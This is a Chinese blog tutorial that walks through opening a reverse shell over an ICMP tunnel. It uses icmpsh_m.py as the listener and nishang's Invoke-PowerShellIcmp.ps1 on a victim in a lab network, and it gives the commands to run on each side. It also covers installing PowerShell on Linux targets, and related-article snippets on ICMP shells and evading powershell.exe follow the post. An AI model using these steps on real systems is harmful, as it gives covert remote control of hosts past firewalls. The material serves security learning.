winexec函数 执行powershell 脚本_powershell搭建icmp隧道

最新推荐文章于 2023-03-17 09:04:59 发布
最新推荐文章于 2023-03-17 09:04:59 发布
阅读量246 收藏
点赞数
文章标签: winexec函数 执行powershell 脚本

2550a9a937ca64aeb57b9e754a10cb34.png

 说明

与其说是powershell搭建icmp隧道,不如说是icmpsh+powershell搭建的。icmpsh的使用可以参考上上篇的文章,它是在攻击机执行icmpsh_m.py文件,然后在受害机执行的icmpsh.exe。

842f44bc9954877d69474a82dbc05d47.png

现在针对powershell的方法,就是把icmpsh.exe换成powershell脚本。攻击机还是运行icmpsh_m.py。

c93316af1e6ed4b3610016ee3ee9d4c2.png

像之前的icmpsh.exe是只能在目标机为windows的系统上运行,而powershell脚本只要目标机有环境就可以运行,这也是他们的一个区别。

过程

我这里换了下ip地址,和上面图中的不一样。

首先在攻击机上将系统icmp回应关掉,然后执行icmpsh_m.py,指定攻击ip和目标ip。

sysctl -w net.ipv4.icmp_echo_ignore_all=1./icmpsh_m.py 192.168.241.128 192.168.241.129

在受害机运行我们的powershell脚本,脚本使用nishang中的Invoke-PowerShellIcmp.ps1,脚本使用方法和之前的icmpsh.exe类似,导入模块,然后跟攻击机ip即可,如下图。

powershellImport-Module .\Invoke-PowerShellIcmp.ps1Invoke-PowerShellIcmp 192.168.241.128

426fd041b87af9ddeb0c2d452e2a80ed.png

随后,我们的攻击机就会接收到返回的shell。

c5a96bb6a9100587990fa83d2704f87a.png

查看数据包。

1601f9128e4a5172bac4dbaa368e8aa2.png

目标机Linux

针对目标机为linux的情况,如果目标机没有powershell环境,我们需要安装一下,找到powershell的对应的rpm包下载后安装即可。

wget https://github.com/PowerShell/PowerShell/releases/powershell-xxxxx-centos

因为以后会更新版本的问题,这里具体的下载连接就拿xxx举例,具体连接在github上获取。

rpm -ivh powershell.rpm

相关截图如下:

3600f1018f641dc99f0a8a83b3426e39.png

47386e5c702e0084ce3ef0b45a2099b7.png

0591bf9031433ce3cfc6f4bc1e81bedc.png

Linux安装powershell问题

如果powershell使用rpm -ivh命令安装提示没有依赖包的情况,则需要安装相应的依赖包,考虑到依赖包如果在比较多的情况下,且相互依赖关系复杂,不利于我们安装,所以我们可以使用yum命令本地安装的方法,让它自动解决依赖问题,命令如下。

yum localinstall percona-xxxx.rpm -y

再有一种情况就是,如果目标机在内网,yum命令使用有限,上述命令不能使用的时候,我们另一种办法进行解决。即把powershell涉及到的rpm包依赖全部拷贝到目标机,然后一块安装。

操作步骤:首先我们需要在本机的环境中修改yum的配置文件,将其缓存功能打开,作用就是yum命令安装的rpm包所涉及到的依赖都会保存下载。

/etc/yum.conf

然后将配置文件中的keepcache=1值改为1,这时再使用yum来安装rpm包,涉及到的依赖都会保存在/var/cache/yum下,我们把这些包统一上传到目标机,然后执行下面的命令即可。

rpm -ivh *.rpm --nodeps --force
weixin_39655160
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
WinExec, ShellExecute, CreateProcess三个函数的区别和联系
ghevinn欢迎您光临
03-08 2643
三个SDK函数: WinExec,ShellExecute ,CreateProcess可以实现调用其他程序的要求,其中以WinExec最为简单,ShellExecute比WinExec灵活一些,CreateProcess最为复杂。     WinExec 两个参数,前一个指定路径,后一个指定显示方式。     ShellExecute 可以指定工作目录,并且还可以寻找文件的关联直接打开不用加
winexec函数 执行powershell 脚本_丢掉 Powershell.exe 来渗透测试
weixin_39953100的博客
12-01 236
0x00 前言作为一个 pentest,真的是不需要 Powershell 吗?如果是,我真的会觉得不可思议。但是,如果是因为某些策略,阻止了你对 powershell.exe 的访问,那该怎么办?宾果,你想对了,有好几个众所周知的解决方案,在本文中,我们使用 C# 程序集来执行我们的powershell脚本。首先,我们为什么可以不使用powershell.exe来执行.ps1...
winexec函数 执行powershell 脚本_浅剖PowerShell命令语法
weixin_39911066的博客
12-12 190
前言刚接触PowerShell的时候,只是给它的管道命令所吸引;其管道命令是面向对象,也就是说针对对象进行操作处理,不像cmd是针对文本操作处理。而且大部分cmd命令在PowerShell中也得到保留,正确来讲是PowerShell命令是cmd命令的超集;还有命令输入输出重定向,微软在设计PowerShell也提出注重保留用户操作习惯,支持命令别名;命令的可扩展性,拥有庞大的.Net框架支持,近乎...
python动态语言双刃性_攻击与防御的双刃剑:深入分析PowerShell的两面性
weixin_39671467的博客
12-08 178
概述在这一系列文章中,我将站在攻击与防御的两个不同视角,重点介绍已知攻击者如何利用不同的策略和技术来实现其恶意目的,并分析我们应该如何检测并阻止这些恶意活动。我将使用MITRE ATT&CK知识库和术语来说明其中涉及的各项技术。如果大家对MITRE ATT&CK技术不是很了解,建议可以先参考我在2018年发表过的文章和视频,题目名为“了解网络犯罪分子的工作方式,实现更加智能的安全”...
icmp协议_利用ICMP(icmpsh)协议反弹Shell 渗透红队笔记
weixin_39872257的博客
12-01 342
渗透攻击红队一个专注于红队攻击的公众号大家好,这里是渗透攻击红队的第 十篇文章,本公众号会记录一些我学习红队攻击的复现笔记(由浅到深),每周一更。ICMP隧道ICMP隧道是一个比较特殊的协议。在一般的通信协议里,如果两台设备要进行通信,肯定要开放端口,而在ICMP协议下就不需要。最常见的ICMP消息为Ping命令的回复,攻击者可以利用命令得到比回复更多的ICMP请求。在通常情况下...
VC WinExec打开指定程序或者文件的方法
09-06
WinExec 函数Windows 操作系统中一个常用的函数,用于打开指定的程序或者文件。该函数提供了一个简单的方式来运行新程序,且可以指定程序的显示方式。 WinExec 函数的原型为:UINT WinExec(LPCTSTR lpCmdLine, ...
Delphi 使用winexec执行备份还原注册表.rar
07-10
Delphi 备份还原注册表,使用了winexec执行pchar命令,注册表简单备份程序,也可根据备份文件还原注册表内容,在对注册表进行一些重大设置之前,备份注册表是安全这举,这是一个好习惯,若是设置出了问题,还可...
API进程与线程函数WinExec、ShellExecute、LoadLibrary、FreeLibrary.pdf
11-04
WinExec、ShellExecute、LoadLibrary 和 FreeLibrary 四个函数都是 Windows 操作系统中的一些基本函数,它们负责管理进程和线程的创建、执行和销毁。这些函数的使用可以帮助开发者更好地管理程序的执行和资源的使用...
C下执行命令行的方法汇总
12-26
WinExec() 函数用于运行可执行程序,它可以执行任何类型的可执行文件。WinExec() 函数的使用格式为:`UINT WinExec(LPCSTR lpCmdLine, UINT uCmdShow);` 其中,`lpCmdLine` 是要执行的命令行,`uCmdShow` 是定义 ...
通过ICMP协议反弹SHELL并执行命令
Fly_鹏程万里
05-23 3629
前言内网中的大多数系统都位于防火墙和企业代理之后,以便控制入口以及出口流量。防火墙可以拦截到反连的shell,但ICMP协议基本上是不拦截的。因此,为了获得shell并在目标主机上执行命令,可以使用ICMP协议作为隐藏通道进行连接。使用icmpsh(https://github.com/inquisb/icmpsh)工具可用来执行此攻击。推特上的大牛@Bernardo Damele已经将其导入到他...
vc执行linux脚本,VC中调用其他应用程序的方法(函数) WinExec,ShellExecute ,CreateProcess...
weixin_32277761的博客
04-30 347
三个SDK函数:WinExec,ShellExecute,CreateProcess可以实现调用其他程序的要求,其中以WinExec最为简单,ShellExecute比WinExec灵活一些,CreateProcess最为复杂。//打开C:\Test.txt 文件ShellExecute(NULL, "open","http://www.google.com",/ NULL, NULL, SW_S...
nishangICMP反弹shell攻击
wodepzw的博客
11-19 288
准备 靶机Windows10 IP 192.168.0.164 攻击机kali IP 192.168.0.159 靶机下载好nishang 下载链接https://github.com/samratashok/nishang 攻击机下载好icmpsh 下载链接https://github.com/inquisb/icmpsh.git 1.先查看两个机子是否能ping通 2.用管理员权限打开powe...
ICMP隧道技术 - icmpsh
shawdow_bug的博客
09-12 963
ICMP隧道工具 icmpsh 使用。
ICMP隧道icmpsh利用
Zlirving_的博客
02-10 593
ICMP隧道 icmp隧道简单、实用,是一个比较特殊的协议。在一般的通信协议里,如果两台设备进行通信肯定需要开放端口,而在icmp协议中则不需要。最常见的icmp消息为ping命令的回复,攻击者可以利用命令行得到比回复更多的icmp请求。 利用价值,在利用 ping 穿透防火墙的检测,因为通常防火墙是不会屏蔽 ping 数据包的。 icmpsh icmpsh是一个简单的ICMP反弹shell工具,拥有用C,Perl和Python实现的POSIX兼容主控端和一个win32的受控端。相比其他类似的开源工具来说,
windows反弹shell复现
热门推荐
就是我的博客
04-06 1万+
windows反弹shell 简介: reverse shell(反弹shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell类似,本质上是网络概念的客户端与服务端的角色反转,就是让目标机执行反向连接攻击机。 在实战中多配置命令执行等漏洞进行使用。 环境: 攻击机:IP为192.168.1.111,系统信息 Linux kali 5.10.0-kali3-amd6...
icmp反弹协议——icmpsh
weixin_50683638的博客
04-08 334
ICMP隧道 前言 一、ICMP(Internet Control Message Protocol)Internet控制报文协议。它是TCP/IP协议簇的一个子协议,用于在IP主机、路由器之间传递控制消息。控制消息是指网络通不通、主机是否可达、路由是否可用等网络本身的消息。这些控制消息虽然并不传输用户数据,但是对于用户数据的传递起着重要的作用。 常见的ICMP隧道工具有:icmpsh、PingTunnel、icmptunnel、powershell icmp等。 内容 开启两台虚拟机这里用到的是kali和
python:在Windows上使用 Python
点点关注不迷路
03-17 5087
python:在Windows上使用 Python
请编写一个可执行程序Demo.exe,该程序使用Windows API “WinExec”启动程序”calc.exe”
最新发布
07-08
以下是一个简单的C语言示例代码,用于创建一个可执行程序Demo.exe,该程序使用Windows API函数"WinExec"启动计算器程序"calc.exe"。 ```c #include <windows.h> int main() { // 使用WinExec函数启动calc.exe程序 WinExec("calc.exe", SW_SHOW); return 0; } ``` 你可以将以上代码保存为main.c,并使用C编译器(如GCC)进行编译,生成Demo.exe可执行文件。运行Demo.exe后,它将使用WinExec函数启动计算器程序。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值